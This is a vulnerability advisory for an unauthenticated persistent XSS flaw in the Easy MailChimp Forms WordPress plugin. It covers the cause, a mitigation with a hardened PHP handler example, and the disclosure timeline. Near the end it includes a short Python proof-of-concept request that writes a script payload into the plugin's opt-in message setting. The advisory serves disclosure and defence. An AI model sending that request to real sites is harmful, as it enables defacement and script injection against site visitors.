Easy MailChimp Forms 3.0 - 5.0.6, Persistent XSS
Because a single AJAX handler is registered for anonymous users with the ‘nopriv’ hook (wp_ajax_nopriv_), unauthenticated users can update this plugin's settings, including the Custom Opt-In Message, which accepts HTML content. This allows a persistent XSS attack, defacement of website content, or injection of malicious scripts / iframes.
Homepage
https://wordpress.org/plugins/yikes-inc-easy-mailchimp-extender/
CVSS Score
6.4
CVSS Vector
(AV:N/AC:L/Au:N/C:P/I:P/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Remove the vulnerable AJAX definition in the ‘lib/lib.ajax.php’ file. If public access to some of the AJAX functions exposed by this definition is required, expose only those functions through a separate AJAX definition, and keep the settings-update path behind a capability check. Version 5.0.7 ships the vendor's fix (see Timeline).
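The separation the mitigation calls for, shown as an added PHP illustration that is not the plugin's own code: the action name ‘yks_mailchimp_form’ and the ‘update_options’ form_action value come from this advisory, while the handler names, nonce action and option name are assumptions.

```php
<?php
// Added illustration, not code from the plugin. Hypothetical names:
// yks_dispatch_all(), yks_public_ajax(), yks_admin_ajax(),
// the 'yks_admin_nonce' nonce action and the 'yks_double_optin_message' option.

// Weak pattern described in the advisory: one dispatcher registered on both
// hooks, so an anonymous request reaches the update_options branch.
add_action( 'wp_ajax_yks_mailchimp_form',        'yks_dispatch_all' );
add_action( 'wp_ajax_nopriv_yks_mailchimp_form', 'yks_dispatch_all' );

// Hardened: separate definitions. Only the public subscribe flow is
// registered under nopriv; settings changes live on a logged-in-only hook.
add_action( 'wp_ajax_nopriv_yks_mailchimp_form_public', 'yks_public_ajax' );
add_action( 'wp_ajax_yks_mailchimp_form_admin',         'yks_admin_ajax' );

function yks_public_ajax() {
    // Public path: validate the address and hand it to the subscribe logic
    // (hooked on a hypothetical action). No option is touched here.
    $email = isset( $_POST['email'] ) ? sanitize_email( wp_unslash( $_POST['email'] ) ) : '';
    if ( ! is_email( $email ) ) {
        wp_send_json_error( 'invalid email', 400 );
    }
    do_action( 'yks_subscribe_request', $email );
    wp_send_json_success();
}

function yks_admin_ajax() {
    // Logged-in is not enough: require the capability and a valid nonce.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    check_ajax_referer( 'yks_admin_nonce', 'nonce' );

    $form_action = isset( $_POST['form_action'] ) ? sanitize_key( $_POST['form_action'] ) : '';
    if ( 'update_options' !== $form_action ) {
        wp_send_json_error( 'unknown action', 400 );
    }

    // form_data is a URL-encoded string; decode it, then strip script/iframe
    // tags from the opt-in message so stored content cannot execute.
    parse_str( wp_unslash( $_POST['form_data'] ?? '' ), $fields );
    $message = wp_kses_post( $fields['double-optin-message'] ?? '' );
    update_option( 'yks_double_optin_message', $message );
    wp_send_json_success();
}
```

wp_kses_post keeps ordinary post markup but removes script and iframe elements; use sanitize_text_field instead if the message should never contain HTML at all.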
Proof of Concept
The following Python script updates the content of the Custom Opt-In Message with the content of the html_payload variable.
import requests
html_payload = "<script>alert('.');</script>"
url = 'http://localhost/wp-admin/admin-ajax.php'
payload = {
"action":"yks_mailchimp_form",
"form_action":"update_options",
"form_data":"yks-mailchimp-api-key=&yks-mailchimp-flavor=1&yks-mailchimp-optin=true&double-optin-message=%s&single-optin-message=&interest-group-label=Select+Your+Area+of+Interest&yks-mailchimp-optIn-checkbox=1&yks-mailchimp-optin-checkbox-text=SIGN+ME+UP!&yks-mailchimp-optIn-default-list=select_list"%html_payload
}
r = requests.post(url, data=payload)
Timeline
- 2014-09-19: Discovered
- 2014-09-19: Reported to vendor
- 2014-09-19: CVE requested
- 2014-09-19: Vendor acknowledged and stated a fix would be made today
- 2014-09-19: 5.0.7 released – issue resolved
- 2014-09-22: CVE assigned
- 2014-09-26: Advisory released